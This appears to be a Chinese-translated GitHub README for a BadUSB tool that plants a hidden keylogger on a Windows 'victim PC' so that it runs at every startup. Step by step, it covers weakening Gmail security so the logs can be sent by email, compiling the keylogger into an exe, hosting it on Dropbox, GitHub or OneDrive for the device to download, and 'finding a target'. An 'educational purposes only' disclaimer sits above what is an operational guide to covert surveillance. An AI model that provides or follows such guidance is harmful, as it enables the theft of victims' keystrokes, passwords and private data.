tuconnaisyouknow/BadUSB_keyloggerInjector

# BadUSB_keyloggerInjector # 警告 ⚠️ 本仓库中的所有内容**严格**仅用于教育目的。请注意，**我对**任何被盗数据**概不负责**。您须对自己使用开发的 **BadUSB** 脚本所采取的行为**负责**。 # 关于 ℹ️ 此**脚本**允许您注入一个在 **Windows** 启动时运行的隐形**键盘记录器**。为此，我使用了这个[键盘记录器脚本](https://github.com/x4nth055/pythoncode-tutorials/tree/master/ethical-hacking/keylogger)。 ### 注意事项 1（针对 arduino BadUSB） 有时，您会看到类似这样的内容： ``` Keyboard.press(KEY_LEFT_CTRL); Keyboard.press(KEY_LEFT_ALT); Keyboard.press(173); Keyboard.releaseAll(); ``` 这只是为了输入这些字符："@"、"\\"。但这取决于计算机的键盘布局，因此请通过此[网站](https://www.csee.umbc.edu/portal/help/theory/ascii.txt)以及您实际使用键盘输入这些字符的序列来调整这些字符。（或者将键盘布局切换为法语）。 ### 美式键盘布局 对于美式键盘布局，您只需将 "\\" 替换为以下内容： ``` Keyboard.press(92); Keyboard.releaseAll(); ``` 并将 "@" 替换为以下内容： ``` Keyboard.press(64); Keyboard.releaseAll(); ``` ### 注意事项 2 您可以根据插入 **BadUSB** 的速度自定义**延迟**。 ### 注意事项 3 当您将 BadUSB 插入 PC 时，必须等待 Caps Lock 指示灯闪烁后才能将其拔出。 # 开始使用 ✔️ ## 环境要求 1. 拥有一个 **BadUSB**。 2. 在[此处](https://www.arduino.cc/en/software)安装 **Arduino 软件**（如果您的 BadUSB 基于 Arduino）； 3. 拥有一个 **Gmail** 帐户并在[此处](https://www.google.com/settings/security/lesssecureapps)启用**安全性较低的应用访问权限**； 4. 您的 PC 上已安装最新版本的 Python； 5. 您的 PC 上已安装最新版本的 pip； 6. 拥有一台安装了 **Windows OS** 的受害者 PC； # 安装最新版本的 Python 和 pip ## Python 1. 在[此处](https://www.python.org/downloads/windows/)下载最新的 Python 版本（64 位或 32 位安装程序）； 2. 现在运行安装程序； 3. 选中“Add python.exe to PATH”复选框，然后点击“install now”； ## Pip 1. 启动 powershell 提示符并运行以下命令以下载 get-pip.py： ``` curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py ``` 2. 然后运行以下命令以安装 pip： ``` python get-pip.py ``` ## 安装 1. 下载本仓库； **Linux：** ``` git clone https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector cd BadUSB_keyloggerInjector ``` **Windows：** 点击主页右上角的绿色按钮。然后点击“Download Zip”并解压 zip 文件。 2. 在[此处](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/keylogger.py)的第 8、9 行替换您的邮箱和密码； 3. 使用以下命令将 keylogger.py 转换为 exe 文件： ``` pip install pyinstaller pyinstaller --onefile -w keylogger.py ``` 4. [上传](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/edit/main/README.md#how-to-set-a-link-for-wget-the-script-%EF%B8%8F)您的文件以下载它们； 5. 将[此处](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/keylogger.ino)第 93 行的链接替换为 keylogger.exe 的链接； 6. 将 .ino 或 .txt 文件放入您的 BadUSB 中； 7. 寻找目标并开始吧！ ## 受害者 PC 的要求 * 关闭 Caps Lock。 * 将键盘布局切换为法语（或根据您的布局调整代码）。 # 如何设置链接以通过 wget 下载脚本 ⬇️ 请记住先上传 keylogger.exe 文件，以便将其链接添加到 startSrcipt.ps1 文件中。 ## Dropbox 1. 在[此处](https://www.dropbox.com)创建一个 Dropbox 帐户； 2. 上传您的文件； 3. 复制该文件的链接，并将 ?dl=0 更改为 ?dl=1； 4. 您将获得一个类似这样的链接：https://dropbox.com/s/link/YOURFILE?dl=1； 5. 现在将此链接放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.txt) 文件中； ## Github 1. 在[此处](https://github.com/signup)创建一个 Github 帐户； 2. 创建一个公开仓库； 3. 上传您的文件； 4. 转到您的文件页面并点击 RAW 按钮； 5. 复制 RAW 页面链接并将其放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.txt) 文件中； ## One Drive 1. 在[此处](https://signup.live.com/signup)创建一个 One Drive 帐户； 2. 上传您的文件； 3. 按照此[教程](https://mangolassi.it/topic/19276/how-to-configure-a-onedrive-file-for-use-with-wget)操作； 4. 将您获得的链接放入 [.ino](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.ino) 或 [.txt](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keyloggerInjector.txt) 文件中；

标签：AI合规, Arduino, BadUSB, Python, 无后门, 漏洞挖掘, 逆向工具, 键盘记录